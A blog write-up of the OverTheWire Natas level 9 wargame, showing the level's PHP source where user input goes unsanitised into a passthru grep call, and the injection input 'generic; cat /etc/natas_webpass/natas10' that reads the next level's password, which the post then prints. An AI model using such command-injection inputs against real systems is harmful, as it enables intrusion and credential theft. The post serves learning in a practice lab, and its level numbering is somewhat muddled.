Natas- level 9 Writeup

level9By the looks of it this level looks like a dictionary. where you enter a word and search for it’s associated synonyms meaning  or what ever :P. Now lets look at the code for proper understanding.

<code><html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
	<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
	<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
	<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas9", "pass": "<censored>" };</script></head>
<body>
<h1>natas9</h1>
<div id="content">
<form>
Find words containing: <input name=needle><input type=submit name=submit value=Search>


</form>


Output:
<pre>
<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    passthru("grep -i $key dictionary.txt");
}
?>
</pre>
<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html></code>

the most important part of the source here is

</pre>
<pre><code><?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    passthru("grep -i $key dictionary.txt");
}
?></code></pre>
<pre>

here a passthru function is invoked which is a similar version of exec() function in that it executes a command and sends output directly to the browser.

here a word that we enter is assigned to the variable $key and is filtered through the file “dictionary.txt” since this is executed directly we can do something similar to a SQL injection

therefore we pass a cat command there which will reveal the password for this level stored at /etc/natas_webpass/natas9. if we type in

generic; cat /etc/natas_webpass/natas10

this would display the password for the next level

 

access Level 9 with the following credentials

Username: natas10
Password: nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu
URL: http://natas10.natas.labs.overthewire.org/

Follow the next post for NATAS 10 Write Up

NATAS 10

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Blog at WordPress.com.

Up ↑

%d bloggers like this: